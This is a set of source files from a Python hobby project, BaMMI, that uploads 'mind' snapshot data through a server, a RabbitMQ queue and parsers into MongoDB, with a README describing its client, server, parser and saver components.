"length_bytes": 461, "license_type": "no_license", "max_line_length": 66, "num_lines": 12, "path": "/BaMMI/parsers/all_parsers/Pose.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "\n\ndef parse_pose(context, snapshot):\n if 'pose' not in snapshot:\n raise KeyError(\"Snapshot is missing the Pose data\")\n pose_data = snapshot['pose']\n if 'translation' not in pose_data:\n raise KeyError(\"Snapshot is missing the Translation data\")\n if 'rotation' not in pose_data:\n raise KeyError(\"Snapshot is missing the Rotation data\")\n return context.format_returned_data('pose', snapshot['pose'])\n\n\nparse_pose.field = 'pose'\n" }, { "alpha_fraction": 0.6147426962852478, "alphanum_fraction": 0.6147426962852478, "avg_line_length": 36.842105865478516, "blob_id": "0bf8dc241c154645dd1642c2a9f2c4ec7e273078", "content_id": "035c37aad7333a27aedf8ed31a09c9bcba0e9181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 102, "num_lines": 19, "path": "/BaMMI/parsers/Context.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import os\nfrom ..utils import UtilFunctions\n\n\nclass Context:\n\n def __init__(self, base_path, user_data, snapshot_data):\n self.base_path = base_path\n self.user_id = user_data['user_id']\n self.snapshot_timestamp = snapshot_data['datetime']\n\n def generate_path(self, file_name):\n of_the_jedi = UtilFunctions.build_path_for_files_from_data(self.base_path, self.user_id,\n self.snapshot_timestamp, file_name)\n UtilFunctions.ensure_dir(os.path.dirname(of_the_jedi))\n return of_the_jedi\n\n def format_returned_data(self, field_name, data):\n return {'datetime': self.snapshot_timestamp, field_name: data}\n" }, { "alpha_fraction": 0.5779660940170288, "alphanum_fraction": 0.6101694703102112, "avg_line_length": 20.851852416992188, "blob_id": "2f0e8a71608e737803d63295c8687656fd39b4b0", "content_id": "c2b3f63dc5b2437d4a78408f674adfb8f042bf46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "no_license", "max_line_length": 82, "num_lines": 27, "path": "/tests/test_listener.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "# TODO: Update tests! They're old and not relevant\n\n\n# import socket\n# import time\n#\n# import pytest\n#\n#\n# _PORT = 1234\n# _HOST = '127.0.0.1'\n# _BACKLOG = 5000\n# _REUSEADDR = True\n#\n#\n# @pytest.fixture\n# def listener():\n# pass\n# # return Listener(_PORT, host=_HOST, backlog=_BACKLOG, reuseaddr=_REUSEADDR)\n#\n#\n# def test_context_manager(listener):\n# assert socket.socket().connect_ex((_HOST, _PORT)) != 0\n# with listener:\n# time.sleep(0.1)\n# assert socket.socket().connect_ex((_HOST, _PORT)) == 0\n# assert socket.socket().connect_ex((_HOST, _PORT)) != 0\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 20.10344886779785, "blob_id": "9094a638099c5aca2189a105d92d5f32a3f7db2a", "content_id": "7400bffbdab340c275eb0eff2cf81bffe20c401f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/BaMMI/utils/CLITemplate.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport traceback\nimport click\n\n\nclass Log:\n\n def __init__(self):\n self.quiet = False\n self.traceback = False\n\n def __call__(self, message):\n if self.quiet:\n return\n if self.traceback and sys.exc_info(): # there's an active exception\n message += os.linesep + traceback.format_exc().strip()\n click.echo(message)\n\n\nlog = Log()\n\n\[email protected]()\[email protected]('-q', '--quiet', is_flag=True)\[email protected]('-t', '--traceback', is_flag=True)\ndef main(quiet=False, traceback=False):\n log.quiet = quiet\n log.traceback = traceback\n" }, { "alpha_fraction": 0.6568074822425842, "alphanum_fraction": 0.6568074822425842, "avg_line_length": 40.764705657958984, "blob_id": "0ae42d5a85daaeb70460b54a91f9807704e89d79", "content_id": "77ab1076ab4fd9d41ff505fc7bd132c8c1612a5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2130, "license_type": "no_license", "max_line_length": 116, "num_lines": 51, "path": "/BaMMI/utils/drivers/mq_drivers/RabbitDriver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from urllib.parse import urlparse\nimport pika\n\n\navailable_exchanges = ['direct', 'topic', 'fanout', 'headers']\n\n\nclass RabbitDriver:\n\n def __init__(self, url):\n parsed_url = urlparse(url)\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=parsed_url.hostname, port=parsed_url.port))\n self.channel = self.connection.channel()\n self.exchange_name = ''\n self.queue_name = ''\n\n def init_exchange(self, exchange_name, exchange_type):\n if exchange_type not in available_exchanges:\n raise ValueError(f\"Unknown exchange type for RabbitMQ. Choose one of {available_exchanges}\")\n self.channel.exchange_declare(exchange=exchange_name, exchange_type=exchange_type)\n self.exchange_name = exchange_name\n\n def init_queue(self, queue_name, *args, **kwargs):\n result = self.channel.queue_declare(queue=queue_name, *args, **kwargs)\n if not queue_name:\n self.queue_name = result.method.queue\n\n def publish_message(self, message, routing_key='', *args, **kwargs):\n self.channel.basic_publish(\n exchange=self.exchange_name, routing_key=routing_key, body=message, *args, **kwargs)\n\n def consume_messages(self, callback, *args, **kwargs):\n if not self.queue_name:\n self.init_queue('')\n self.channel.basic_consume(queue=self.queue_name, on_message_callback=callback, *args, **kwargs)\n self.channel.start_consuming()\n\n def bind_queue(self, binding_keys=None):\n if not self.queue_name:\n self.init_queue('')\n if isinstance(binding_keys, list):\n for binding_key in binding_keys:\n self.channel.queue_bind(exchange=self.exchange_name, queue=self.queue_name, routing_key=binding_key)\n elif isinstance(binding_keys, str):\n self.channel.queue_bind(exchange=self.exchange_name, queue=self.queue_name, routing_key=binding_keys)\n else:\n raise TypeError(\"Binding keys format isn't recognized, pass a string or a list of strings\")\n\n def close(self):\n self.connection.close()\n" }, { "alpha_fraction": 0.7348873615264893, "alphanum_fraction": 0.7434343695640564, "avg_line_length": 53.08403396606445, "blob_id": "15dfcd9350db60c32878721552d0eef9eae6b169", "content_id": "3d124903c5ba5760750e83af8f6cad8903a83ca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6437, "license_type": "no_license", "max_line_length": 163, "num_lines": 119, "path": "/README.md", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "![BaMMI_Not_Bambi](https://vignette.wikia.nocookie.net/disney/images/c/ce/Profile_-_Bambi.png/revision/latest/scale-to-width-down/1031?cb=20190313173158)\n[![Build Status](https://travis-ci.com/roypel/BaMMI.svg?branch=master)](https://travis-ci.com/roypel/BaMMI)\n![coverage](https://codecov.io/gh/roypel/BaMMI/branch/master/graph/badge.svg)\n\n*This project isn't related to Bambi™ in any way, except they share 80% of the letters in their name* \n\n# BaMMI\nBaMMI is a Basic Mind-Machine Interface, designed to let you save, manage and communicate your thoughts to a machine!\nHow cool is that?!\n\n\n## Installation\n\n1. Clone the repository and enter it:\n\n ```sh\n $ git clone [email protected]:roypel/BaMMI.git\n ...\n $ cd BaMMI/\n ```\n\n2. Run the installation script and activate the virtual environment:\n\n ```sh\n $ ./scripts/install.sh\n ...\n $ source .env/bin/activate\n [BaMMI] $ # Let's roll\n ```\n \n \n## Usage\n\n`BaMMI` provides access to five different components via API and command-line interface.\nThe five components are a client, a server, parser handler, saver\n and an API to communicate with a DB that keeps the data.\n\nWhile the components can work independently, and might also integrate\n with different services that aren't provided in this package, there's a provided `run-pipeline.sh` script\n that will orchestrate all the needed backend so you could just use the client \n (simply use `python -m BaMMI.client upload-sample /path/to/snapshot/data` after installation finishes) to upload some data and \n see how it all works. To know all is up, a pytest tests will be launched until they pass, might take a minute or two\n until all the services are up.\n\nNote that all the CLI commands accept the `-q` or `--quiet` flag to suppress output, and the `-t`\nor `--traceback` flag to show the full traceback when an exception is raised\n(by default, only the error message is printed, and the program exits with a\nnon-zero code).\n\n### Client\n\nThe client is available as `BaMMI.client` with the `upload_sample` API that given a `host`, `port`, and a `path` to \na local snapshot file, will upload the given file in `path` to _`host:port`_.\n\nThere's also an option to upload a file through the CLI, via `python -m BaMMI.client upload-sample`, which has\nthe options to receive a host (_`-h`_ or _`--host`_) and a port (_`-p`_ or _`--port`_), and a path to the snapshot file.\n\nThe default values both in the API and CLI are `host='127.0.0.1'`, `port=8000`.\n\nNote that the expected file format is a gzipped binary file that has a sequence of message sizes (uint32) and messages\nof the corresponding sizes, assuming the first message is a User message and the rest are this user snapshots.\n\nThe messages are expected to contain messages as defined in [this .proto file](https://storage.googleapis.com/advanced-system-design/cortex.proto).\nAlso, a sample file [is available here](https://storage.googleapis.com/advanced-system-design/sample.mind.gz).\nPlease refrain from downloading it without any certain need.\n\n\n### Server\n\nThe server is available as `BaMMI.server`, with the `run_server` API, and the `run-server` command in the CLI (`python -m cortex.server run-server`).\nBoth get a `host` and `port` as was in the client, and they also have the same defaults and options, while unlike the client the server gets a publish destination.\n\nWhat does it mean? Well, in the API there's an option to pass a `publish` function, that any snapshot data that the server receives\nwill be sent to the function and handled there. On the CLI, passing a function isn't possible, however there's an option to pass \na MQ URL (RabbitMQ is preferred currently) that the server will publish the data there, so others may consume and process it.\n\nThe expected URL format is `service-name://user:password@host:port/`, e.g. `rabbitmq://127.0.0.1:5672/`.\n\nIn case you use the CLI or the default publish function, know that the data that will be published to the MQ as a JSON,\ncontaining `user_data` and `snapshot_data` keys that points to the data as sent to the server, except for binary data\nthat is saved to a storage and a path is given instead of the data itself.\n\n### Parsers\n\nThe parsers are simple functions that process data from the provided MQ, and post their results. If you wish, you can\nadd your own parsers, which will be explained at the end of this section.\n\nAs an API, you can access it in `BaMMI.parsers` using the `run_parser` method, that, given a parser name and raw data\nas published to the MQ, will return the processed result.\n\nAs a CLI, the commands `parse` and `run-parser` are available through `python -m cortex.parsers`. While `parse` gets a parser name\nand a path to raw data as given from the MQ, process it and returns the results as if they were sent to the MQ,\nbasically running the parser only once, using `run-parser` with a parser name and a MQ URL (take a look at the server section\nfor details) will attach the parser to the mQ, consuming raw data, processing and publishing it's result to a dedicated topic in the MQ.\n\nThere are 4 parsers provided, processing the user *feelings*, *pose*, *color_image* and *depth_image*.\nBut what if you want to process a new type of data?\n \n Well that's easy!\n \n All you need to do, is adding a file to _`BaMMI/BaMMI/parsers/all_parsers`_, making sure there's a function named *`parse_*`*\n and that it has a `field` attribute with the name of the field it process from the snapshot data.\n \n ### Saver\n \n The saver is available as `BaMMI.saver`, exposing the `Saver` class, that receives a DB url on it's instantiation, and\n supports the `save` function that given a topic name from the MQ and data in the format that is published to the MQ to this topic, \n saves the data to the DB.\n \n As with the parsers, the CLI has 2 modes - running `python -m cortex.saver` with the `save` command, that given \n a DB url (optional with the `-d` or `--database` flags, defaults to `mongodb://BaMMI:1337@mongo:27017`, and follows the URL\n format in the server section), a topic name and a path to data as published to the MQ, will attempt to save it\n to the DB, working only once, or using the `run-saver` command that receives a MQ url and a DB url,\n and consuming anything it can from the MQ and saves it to the DB.\n \n \n ## Future Plans\n \n API (rashly implemented, not yet tested :[ ) and CLI to see the data in the DB, as well as a GUI for easy navigation of all the users data." }, { "alpha_fraction": 0.6275706887245178, "alphanum_fraction": 0.6285346746444702, "avg_line_length": 40.49333190917969, "blob_id": "496cbe417e9ba82562cd6154259b848c360c7e5b", "content_id": "da3473b00c73b2edbae4588d3f58d1ccdbf94e7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3112, "license_type": "no_license", "max_line_length": 99, "num_lines": 75, "path": "/BaMMI/parsers/ParserHandler.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import importlib\nimport inspect\nimport json\nimport pathlib\nimport sys\nfrom .Context import Context\nfrom ..utils.PubSuber import PubSuber\nfrom ..utils.UtilFunctions import extract_json_from_raw_data, get_true_relative_path\n\n\nclass ParserHandler:\n\n def __init__(self, parsers_folder=get_true_relative_path(__file__, 'all_parsers')):\n self.parsers = {}\n self._load_parsers(parsers_folder)\n\n def _load_parsers(self, root_folder):\n root = pathlib.Path(root_folder).absolute()\n sys.path.insert(0, str(root.parent))\n for path in root.iterdir():\n if path.name.startswith('_') or not path.suffix == '.py':\n continue\n module = importlib.import_module(f'{root.name}.{path.stem}', package=root.name)\n self._load_parse_function(module)\n\n def _load_parse_function(self, module):\n for func_name, func in inspect.getmembers(module, inspect.isfunction):\n if not func_name.startswith('parse'):\n continue\n if isinstance(func.field, list):\n for field in func.field:\n self._add_parser_to_list(field, func)\n else:\n self._add_parser_to_list(func.field, func)\n\n def _add_parser_to_list(self, field, func):\n if field in self.parsers:\n self.parsers[field].append(func)\n else:\n self.parsers[field] = [func]\n\n def parse(self, field_name, raw_data_path):\n user_data, snapshot_data = extract_json_from_raw_data(raw_data_path)\n # TODO: Make base path something reasonable\n context = Context(get_true_relative_path(__file__, '../storage'), user_data, snapshot_data)\n if field_name not in self.parsers:\n raise ModuleNotFoundError(f\"Parser for {field_name} is not found\")\n if len(self.parsers[field_name]) > 1:\n # In case there's a few parsers for a certain field\n parser_results = []\n for func in self.parsers[field_name]:\n parser_results.append(func(context, snapshot_data))\n else:\n parser_results = self.parsers[field_name][0](context, snapshot_data)\n return {'user_data': user_data, 'snapshot_data': parser_results}\n\n def run_parser(self, field_name, mq_url):\n subscriber = PubSuber(mq_url)\n subscriber.init_exchange('snapshots_data', exchange_type='topic')\n subscriber.bind_queue(binding_keys=f'#.{field_name}.#')\n publisher = PubSuber(mq_url)\n publisher.init_exchange('parsers_results', exchange_type='topic')\n print(f\"Starting to listen to {field_name} on {mq_url}...\") # TODO: Put in Logger.Debug\n subscriber.consume_messages(\n lambda ch, method, properties, body: self._forward_parsing(field_name, body, publisher)\n )\n\n def _forward_parsing(self, field_name, data, publisher):\n parser_results = json.dumps(self.parse(field_name, data))\n publisher.publish_message(parser_results, field_name)\n\n\ndef run_parser(field_name, mq_url):\n ph = ParserHandler()\n ph.run_parser(field_name, mq_url)\n" }, { "alpha_fraction": 0.6785123944282532, "alphanum_fraction": 0.6785123944282532, "avg_line_length": 32.61111068725586, "blob_id": "80252bfe99714dd6b438df59871d07e4a5226dcf", "content_id": "d44c7a39cc06ae57726857a42d04b85418083c05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 87, "num_lines": 36, "path": "/BaMMI/utils/PubSuber.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .drivers.mq_drivers import mq_drivers\nfrom ..utils.UtilFunctions import find_driver\n\n\"\"\"\nAt first, I thought about separating the modules to Publisher and Subscriber,\nhowever, since we'll use the same message queue for both anyway (even if it's not RMQ),\nand there are some actions they do the same, I decided to mash it all in one module.\n\"\"\"\n\n\nclass PubSuber:\n\n def __init__(self, url):\n self.pub_sub_driver = find_pub_sub_driver(url)\n\n def publish_message(self, message, *args, **kwargs):\n self.pub_sub_driver.publish_message(message, *args, **kwargs)\n\n def consume_messages(self, callback, *args, **kwargs):\n self.pub_sub_driver.consume_messages(callback, *args, **kwargs)\n\n def init_queue(self, queue_name='', *args, **kwargs):\n self.pub_sub_driver.init_queue(queue_name, *args, **kwargs)\n\n def bind_queue(self, *args, **kwargs):\n self.pub_sub_driver.bind_queue(*args, **kwargs)\n\n def init_exchange(self, exchange_name, *args, **kwargs):\n self.pub_sub_driver.init_exchange(exchange_name, *args, **kwargs)\n\n def close(self):\n self.pub_sub_driver.close()\n\n\ndef find_pub_sub_driver(url: str):\n return find_driver(mq_drivers, url)\n" }, { "alpha_fraction": 0.7563636302947998, "alphanum_fraction": 0.7563636302947998, "avg_line_length": 29.55555534362793, "blob_id": "05dc201a0a3527d830278acfee9854d506391a27", "content_id": "fffd5ee9b23d5f67f9857b015f1a19a7b44fc335", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 102, "num_lines": 9, "path": "/tests/test_mq.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import pika\nimport pytest\n\n\n# Not a real test, used only to check docker-compose finished loading RMQ which takes most of the time\ndef test_mq_up():\n params = pika.ConnectionParameters('localhost')\n connection = pika.BlockingConnection(params)\n connection.channel()\n" }, { "alpha_fraction": 0.8039215803146362, "alphanum_fraction": 0.8039215803146362, "avg_line_length": 51, "blob_id": "d75f9ee4c554a30b8b006d0012e4d89cf0f63b8a", "content_id": "836b70401d26062181dd19309ec99507aef215b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/BaMMI/utils/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .Connection import get_from_url, post_from_url" }, { "alpha_fraction": 0.5601022839546204, "alphanum_fraction": 0.5984655022621155, "avg_line_length": 23.4375, "blob_id": "dcca71d696706da49c36fce882463c9c2f8a01a9", "content_id": "2164ccf8250ab6730b21e8e4b0282ec36a2c674e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1564, "license_type": "no_license", "max_line_length": 100, "num_lines": 64, "path": "/tests/test_thought.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "# TODO: Update tests! They're old and not relevant\n\n\n# import datetime as dt\n# import struct\n#\n# import pytest\n#\n# user_id = 1\n# datetime = dt.datetime(2000, 1, 1, 10, 0)\n# thought = \"I'm hungry\"\n# serialized = b\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\xd0m8\\x00\\x00\\x00\\x00\\n\\x00\\x00\\x00I'm hungry\"\n#\n#\n# @pytest.fixture\n# def t():\n# return Thought(user_id, datetime, thought)\n#\n#\n# def test_attributes(t):\n# assert t.user_id == user_id\n# assert t.timestamp == datetime\n# assert t.thought == thought\n#\n#\n# def test_repr(t):\n# assert repr(t) == f'Thought(user_id={user_id!r}, timestamp={datetime!r}, thought={thought!r})'\n#\n#\n# def test_str(t):\n# assert str(t) == f'[{datetime:%Y-%m-%d %H:%M:%S}] user {user_id}: {thought}'\n#\n#\n# def test_eq(t):\n# t1 = Thought(user_id, datetime, thought)\n# assert t1 == t\n# t2 = Thought(user_id + 1, datetime, thought)\n# assert t2 != t\n# t3 = Thought(user_id, datetime + dt.timedelta(minutes=1), thought)\n# assert t3 != t\n# t4 = Thought(user_id, datetime, thought + '!')\n# assert t4 != t\n# t5 = 1\n# assert t5 != t\n# t6 = lambda: None\n# t6.user_id = user_id\n# t6.timestamp = datetime\n# t6.thought = thought\n# assert t6 != t\n#\n#\n# def test_serialize(t):\n# assert t.serialize() == serialized\n#\n#\n# def test_deserialize(t):\n# t = Thought.deserialize(serialized)\n# assert t.user_id == user_id\n# assert t.timestamp == datetime\n# assert t.thought == thought\n#\n#\n# def test_symmetry(t):\n# assert Thought.deserialize(t.serialize()) == t\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 34.42856979370117, "blob_id": "99cfced5d425c9326b397a833fc53e325acdd22d", "content_id": "6a2555e3d55fec25fbde56f2767d1580780f6bba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 73, "num_lines": 7, "path": "/BaMMI/parsers/all_parsers/Feelings.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "\n\ndef parse_feelings(context, snapshot):\n if 'feelings' not in snapshot:\n raise KeyError(\"Snapshot is missing the Feelings data\")\n return context.format_returned_data('feelings', snapshot['feelings'])\n\n\nparse_feelings.field = 'feelings'\n" }, { "alpha_fraction": 0.6026850342750549, "alphanum_fraction": 0.613933265209198, "avg_line_length": 43.45161437988281, "blob_id": "d13b4418a4938ae60a0c0299a4e905c27689e7a6", "content_id": "fe74ad738ed3be3867c7339216505a59123d1517", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2756, "license_type": "no_license", "max_line_length": 110, "num_lines": 62, "path": "/BaMMI/api/API.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from flask import Blueprint, jsonify, send_from_directory\nfrom ..utils.APIServer import FlaskWrapper\nfrom ..utils.Constants import storage_folder, mongodb_url\nfrom ..utils.DBWrapper import DBWrapper\nfrom ..utils.UtilFunctions import build_path_for_files_from_data\n\n\nbp = Blueprint('serve_data', __name__, url_prefix='/users')\ndb = None\n\n\ndef run_api_server(host='127.0.0.1', port=5000, database_url=mongodb_url):\n global db\n db = DBWrapper(database_url)\n app = FlaskWrapper('api')\n app.register_blueprint(bp)\n app.run(host=host, port=port)\n\n\[email protected]('', methods=['GET'])\ndef get_all_users():\n return jsonify(db.query_data({}, {'_id': 0, 'user_id': 1, 'username': 1}))\n\n\[email protected]('/<user_id>', methods=['GET'])\ndef get_user_data(user_id):\n return jsonify(db.query_data({'user_id': user_id},\n {'_id': 0, 'user_id': 1, 'username': 1, 'birthday': 1, 'gender': 1}))\n\n\[email protected]('/<user_id>/snapshots', methods=['GET'])\ndef get_user_snapshots(user_id):\n return jsonify(db.query_data({'user_id': user_id}, {'_id': 0, 'user_id': 0, 'snapshots.datetime': 1}))\n\n\[email protected]('/<user_id>/snapshots/<snapshot_id>', methods=['GET'])\ndef get_snapshot_details(user_id, snapshot_id):\n snapshot_data = db.query_data({'user_id': user_id, 'snapshots.datetime': snapshot_id},\n {'_id': 0, 'user_id': 0, 'birthday': 0, 'gender': 0, 'username': 0,\n 'snapshots.datetime': 0})\n available_fields = list(snapshot_data['snapshots'].keys())\n return jsonify(available_fields)\n\n\[email protected]('/<user_id>/snapshots/<snapshot_id>/<result_name>', methods=['GET'])\ndef get_parsed_result(user_id, snapshot_id, result_name):\n result_name = result_name.replace(\"-\", \"_\")\n snapshot_data = db.query_data({'user_id': user_id, 'snapshots.datetime': snapshot_id},\n {'_id': 0, f'snapshots.{result_name}': 1})\n result = snapshot_data['snapshots'][0][result_name]\n if isinstance(result, str): # TODO: Come on... You can do better than that...\n possible_file_path = result.split(storage_folder)[1]\n if possible_file_path: # We found that we're about to return path to the file from our storage folder\n return jsonify(f'GET /users/{user_id}/snapshots/{snapshot_id}/{result_name}/data')\n return jsonify(result)\n\n\[email protected]('/<user_id>/snapshots/<snapshot_id>/<result_name>/data', methods=['GET'])\ndef get_file(user_id, snapshot_id, result_name):\n result_name = result_name.replace(\"-\", \"_\")\n return send_from_directory(storage_folder, build_path_for_files_from_data('.', user_id, snapshot_id,\n f'{result_name}.jpg'))\n" }, { "alpha_fraction": 0.6740654110908508, "alphanum_fraction": 0.6740654110908508, "avg_line_length": 28.517240524291992, "blob_id": "b6d2eccbffedc0dbcbde2060af2feb3d40991bb9", "content_id": "0bc5cfe23da31d7344e2bab93329e2cffda814c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 856, "license_type": "no_license", "max_line_length": 94, "num_lines": 29, "path": "/BaMMI/client/Reader.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .ProtoDriver import ProtoDriver\n\n\nclass Reader:\n\n def __init__(self, file_path):\n self.reader_driver = find_reader_driver(file_path)\n\n def close(self):\n self.reader_driver.close()\n\n def get_user_data(self):\n return self.reader_driver.get_user_data()\n\n def get_user_data_ready_to_send(self):\n return self.reader_driver.get_user_data_ready_to_send()\n\n def get_data_content_type(self):\n return self.reader_driver.get_data_content_type()\n\n def generate_snapshot_data_ready_to_send(self, server_accepted_fields=None):\n return self.reader_driver.generate_snapshot_data_ready_to_send(server_accepted_fields)\n\n\ndef find_reader_driver(file_path):\n drivers = {'.mind.gz': ProtoDriver}\n for suffix, cls in drivers.items():\n if file_path.endswith(suffix):\n return cls(file_path)\n" }, { "alpha_fraction": 0.6748971343040466, "alphanum_fraction": 0.6748971343040466, "avg_line_length": 31.399999618530273, "blob_id": "3a9062716eeffb4ce440281a94e04925d0f54fbc", "content_id": "1ff01b2873b58039b28e0b2bf95bf872c0e1328f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 972, "license_type": "no_license", "max_line_length": 87, "num_lines": 30, "path": "/BaMMI/utils/DBWrapper.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .drivers.db_drivers import db_drivers\nfrom .UtilFunctions import find_driver\n\n\nclass DBWrapper:\n\n def __init__(self, url):\n self.db_driver = find_db_driver(url)\n\n def insert_single_data_unit(self, data):\n self.db_driver.insert_single_data_unit(data)\n\n def insert_many_data_units(self, data_list):\n self.db_driver.insert_many_data_units(data_list)\n\n def upsert_data_unit(self, key, data):\n self.db_driver.upsert_data_unit(key, data)\n\n def create_index_for_id(self, key_name, *args, **kwargs):\n self.db_driver.create_index_for_id(key_name, *args, **kwargs)\n\n def query_data(self, query=None, *args, **kwargs):\n return self.db_driver.query_data(query, *args, **kwargs)\n\n def insert_snapshot_data_by_user(self, user_id, snapshot_data, field_name):\n self.db_driver.insert_snapshot_data_by_user(user_id, snapshot_data, field_name)\n\n\ndef find_db_driver(url: str):\n return find_driver(db_drivers, url)\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 47, "blob_id": "7fa6e49ec1464ea3d677c20b2f68f02de0d85381", "content_id": "2522c53f33b5d9c6b28397e0f08b186dc50e57dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/BaMMI/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from BaMMI.server.Server import run_server as run_server\nfrom BaMMI.client.Reader import Reader" }, { "alpha_fraction": 0.672990083694458, "alphanum_fraction": 0.672990083694458, "avg_line_length": 34.709678649902344, "blob_id": "54792366a1c41e71d48b2cb53b75ac82cf0a694b", "content_id": "4e14de970887dec7967270ce0780f77516bcc566", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1107, "license_type": "no_license", "max_line_length": 107, "num_lines": 31, "path": "/BaMMI/utils/Connection.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef handle_request(request):\n try:\n request.raise_for_status()\n return request\n except requests.exceptions.HTTPError as e:\n print(f\"HTTP error: {e}\")\n except requests.exceptions.ConnectionError as e:\n print(f\"Connection error: {e}\")\n except requests.exceptions.Timeout as e:\n print(f\"Timeout Error: {e}\")\n except requests.exceptions.RequestException as e:\n print(f\"Something, somewhere went terribly wrong: {e}\")\n\n\ndef get_from_url(url: str, headers: dict = \"\") -> requests.Response:\n \"\"\"\n Sends a get request to the provided url adding the passed headers and params.\n \"\"\"\n data_request = requests.get(url, headers=headers)\n return handle_request(data_request)\n\n\ndef post_from_url(url: str, headers: dict = \"\", data=\"\", files=\"\", params: dict = \"\") -> requests.Response:\n \"\"\"\n Sends a post request to the provided url adding the passed headers, data, files and params.\n \"\"\"\n data_request = requests.post(url, headers=headers, data=data, files=files, params=params)\n return handle_request(data_request)\n" }, { "alpha_fraction": 0.7023809552192688, "alphanum_fraction": 0.7023809552192688, "avg_line_length": 13, "blob_id": "7e6a4e7b839489d3c8b3d3cbe473c83dc7825d98", "content_id": "97dc29ac979d5a179dd0adb9bf7cc228d67cc865", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/BaMMI/utils/drivers/db_drivers/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .MongoDriver import MongoDriver\n\n\ndb_drivers = {\n 'mongodb': MongoDriver,\n}\n" }, { "alpha_fraction": 0.44692736864089966, "alphanum_fraction": 0.6703910827636719, "avg_line_length": 14, "blob_id": "28f17dfa0fd6a048c729a1cad413183aed290cf0", "content_id": "3e4b6e1b0c8a93250b18d040101f03dc097d380f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 179, "license_type": "no_license", "max_line_length": 17, "num_lines": 12, "path": "/requirements.txt", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "Click==7.0\ncodecov==2.0.16\nFlask==1.1.1\nmatplotlib==3.2.1\nnumpy==1.22.0\npika==1.1.0\nPillow==9.0.1\nprotobuf==3.15.0\npytest==5.3.2\npytest-cov==2.8.1\npymongo==3.10.1\nrequests==2.23.0" }, { "alpha_fraction": 0.6443629860877991, "alphanum_fraction": 0.6443629860877991, "avg_line_length": 40.96154022216797, "blob_id": "09c3a7b6cbfecd17d3522b4c8750e1bc6fb3fcbc", "content_id": "b94b8c8b95b3f1a085a6af1a2268de72d6b70e69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1091, "license_type": "no_license", "max_line_length": 88, "num_lines": 26, "path": "/BaMMI/client/client.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .Reader import Reader\nfrom ..utils.Connection import get_from_url, post_from_url\n\n\ndef upload_sample(host: str, port: int, path: str):\n url = '/'.join((f'http://{\":\".join((host, str(port)))}', 'uploads'))\n reader = Reader(path)\n server_accepted_fields = get_server_fields('/'.join((url, 'config')))\n send_user_data('/'.join((url, 'users')), reader)\n send_snapshots_data('/'.join((url, 'snapshots')), reader, server_accepted_fields)\n\n\ndef send_user_data(url: str, reader: Reader):\n post_from_url(url, headers={'Content-Type': reader.get_data_content_type()},\n data=reader.get_user_data_ready_to_send())\n\n\ndef get_server_fields(url: str):\n return get_from_url(url).json()\n\n\ndef 